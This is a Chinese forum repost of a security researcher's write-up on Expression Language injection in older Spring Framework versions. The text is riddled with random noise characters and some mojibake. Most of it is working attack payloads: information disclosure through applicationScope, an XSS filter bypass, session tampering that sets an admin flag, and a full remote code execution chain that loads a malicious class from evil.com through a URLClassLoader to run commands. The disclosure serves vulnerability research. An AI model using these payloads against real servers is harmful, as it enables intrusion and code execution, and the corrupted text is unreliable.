Remote Code with
6 j& ]4 Q6 k. O& y. [& hExpression Language Injection& e) O7 z( s5 J( p8 B! V0 _
Spring Framework脆弱性—DanAmodio
, }3 o- a) A4 x( i全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中% v0 b @1 i5 k' o5 v9 o' C4 ]8 `
可能会存在风险。
5 H8 O, w4 }3 h0 K ?! G2 Z3 N在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
, P: k6 [3 E# q& }3 RArshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
2 \" |7 e8 \. X5 B1 _- R以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
. \% Y$ Y) ?. m3 ^以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
' Y& J* T. {1 q& H$ H版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
2 `: y3 M* z8 B& O9 M由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
5 ]4 c% M9 f, h& a+ o/ D9 M我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
3 X$ d' H }" I# z/ X9 O* ?) C本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。0 Q. H( o8 t' g) \$ S7 X
这些版本不支持禁用double EL resolution.
, e, {) J! z7 l2 Z" [; H$ C这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含, r* c0 l! M6 e; H2 g# F3 z8 ]% f
EL2.2容器上可能进行远程代码执行。
0 h3 `1 H$ y1 X这是一个原始信息泄露的攻击例子:
$ u: P, {& v# O) \8 H6 P6 ~! h请求:
, w! J- i( g+ N" B: bttp://vulnerable.com/foo?message=${applicationScope}7 `0 U, S5 ?9 x% }, q# k& N
到达以下内容页面:
8 y8 f K& v5 B/ d# d结果将输出一些包含内部服务器信息calsspath 和本地工作目录
) {7 y" L% |! W6 a你也可以做一些其他事情,如这样:
6 |7 P6 Z" E2 B7 t. F% G J+ f" o${9999+1}4 ?& v$ w6 g: S3 {9 e+ v0 C
还可以访问session 对象和beans. |& d! r, K; \ L! f
${employee.lastName}5 K- E) S# P6 o: ^6 z! }
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
) d9 R& d) c& X. rEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
2 A0 J! b. l( {9 m6 G) l( m西,比如XSS.
3 l+ Z F- @, B9 k8 N3 B哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
9 \) l! ~6 Y# p8 V+ q5 e突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤9 a/ \% f5 U1 E$ O: l" N! _
呢?”
% o \( L4 |/ z* |因此,我尝试巳缦拢�! x$ l% o: A7 ]1 p
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
g) `% q% Y, d! Z( ?( V4 BP
5 n7 \( L) J1 d' V9 M. F* P3 Q我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
4 `3 F! n# }9 y, a" W回的文本被插入进了spring:message 标签。
, }+ _5 r! {+ ?, l5 O, e1 \: E, k这里是一个最终绕过过滤的实例:
3 a9 G( [6 h8 Jhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ- r" s( J7 a4 V0 R7 R3 t1 i5 @
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为7 C% L7 J; a* }7 k$ t6 @" x
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
9 F5 l/ s: C* b4 }( o6 M经过一番研究,我学习到EL2.2 增加了方法调用。3 ?4 {! w9 a8 C/ ~: W
我写了一个快速测试应用程序代码并且检测一些功能
% o6 U i. u b8 S2 T: h${pageContext.request.getSession().setAttribute(“account”,”123456″)}3 i# \/ L( E! X8 h7 P
${pageContext.request.getSession().setAttribute(“admin”,true)}6 z$ g9 `# ]% i; ~. s
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的2 |. s7 ]. a1 N
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?+ I( `* _2 D8 I" a
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.12 J7 p( N# R( a
“, 1234)}; s2 k S9 z1 Z* a3 w g
${“”.getClass().forName(“java.lang.Runtime”)}* f) ~7 V$ p6 ]% W+ X
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不2 N8 _- O0 ~6 n
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
/ t8 @" {9 t1 c& e- ~7 S# P数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有$ H4 U3 t, x( ~* f% [3 n: S
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于4 O5 H& s. r0 ]# Y9 k1 }# Z
方法签名invoke(Object obj, Object„ args)$ G! O5 D6 G& h8 |' P8 |/ `
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问5 t, @9 m; y) X* O/ ` ?# l4 p
题,以让它可以工作起来。
- J$ z9 ^# {9 [* f: N1 B漏洞利用:' z8 r1 e0 X/ m- I$ n
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我- g5 E. h( ?% Y, k6 j6 P) ?! I
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
6 I$ [5 L' A+ U% \: e) v( f! I p0 H这里有一些我试过的失败的用例,为了试图让它工作的用例:# z ^/ c! ]% s% n% q: q/ } s
写文件到文件系统* _4 T+ \1 D7 @$ x5 G
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.3 T& h4 V5 k8 b
我认为这些可以很好的工作,但是我不能找到合适的类来载入。' y4 c3 g; u+ J, P4 U
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
' D1 H; l" K3 M# N- yjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:; R$ O. b; n& y8 ~8 r$ C
org.springframework.expression.spel.standard.SpelExpressionParser not found
( f1 k; V4 w5 N+ m. ?2 M) jby+ T/ `) c8 T( m3 C
org.glassfish.web.javax.servlet.jsp [194].# K$ @$ d! f& S0 b4 V w4 F% W
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
, l" m" k7 e5 ]% u8 m8 q 利用反射来创建一个新的Runtime(and watch the world burn)8 | m- n7 T: t, a% u' @
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
0 r2 i; k* }7 |' T(“java.lang.Runtime”)).getDeclaredConstructors()[0])}9 n0 |0 X7 n8 y5 P& {
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}5 r8 n% g* k2 |: X5 k. n1 ]( Z
使用java.lang.ProcessBuilder
h/ {' s, p7 E# U3 z 用表达式语言来评估表达式语言
! O( h/ E5 B3 |2 n8 ^Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
# O+ R$ d, v5 I% u, e* ~" N${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
5 _6 W4 y- g: Z' b- M“,”".getClass(),null)}* R0 Z! c1 v) G( H+ m0 ]2 Q* A
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
8 N- g% f& l5 G& m我在使用一个空数组通过Method.invoke()时失败了很多次- `% X" n6 w8 N" F$ ?3 T& v0 D
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
. V" i+ ?) ]0 _$ G4 _6 v.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
1 L& S! o! b* u' }" c4 Q* f, R# B' }rrayList”).newInstance().toArray())
! s. Z" d; d8 P8 s* Qjava.lang.IllegalArgumentException: wrong number of arguments
}# d' m% B) S, n* s3 G最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可1 J+ b' i& _3 g/ r+ x3 m
以创建一个恶意class文件并且指向类装载器.. A2 } f- j k) I7 `7 r$ U! N+ |
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:8 ~: A [' F& E# I+ O
public class Malicious {2 Z* t2 h+ O- ~ j9 [( B
public Malicious() {. G2 {# t# Y4 z1 j# c1 ~6 N
try {! j; O0 E4 G3 O: ~' x8 L: V. }0 m
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac) I! w0 a. M) W
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
' A9 P/ {: J4 p* G} catch (Exception e) {
' K) y- c4 \& N$ I" \}
- T Y q& X- p: U+ m4 a}
# s* v& o; e) I: X2 J9 Y- R' C3 N! \我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回6 V" T! w. F0 v4 m6 e0 s9 k7 W
话中,因此它可以被使用.
: z* c, D6 j* e) E${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName! m% ~4 w! F. Q& _+ o
(“java.util.ArrayList”).newInstance())}
; e$ [* m: P7 gURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
: D. Y8 j* ^* j' J) X) W一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和, b, g2 `8 ~' s
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个! f- D9 E) X# e1 ^+ U s
我们可以调用的create(string)方法,然后转换对一个URL对象。) x E( Y* M3 c& k5 x
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
8 m% g1 ?3 e/ @ere/malicious/classfile/is/located/”).toURL())}
& B2 ^6 ~3 x! q) b2 \* G然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
+ {8 e( ~& V5 V% ^恶意类文件被装载并创建,触发远程代码.3 a5 j1 K$ s% X9 Y+ Z; E
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte/ `( {1 Q1 J$ {2 N0 K, W! o
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
4 u$ k0 ^3 |1 }getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
8 V( ^- g8 D4 E' p$ M()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对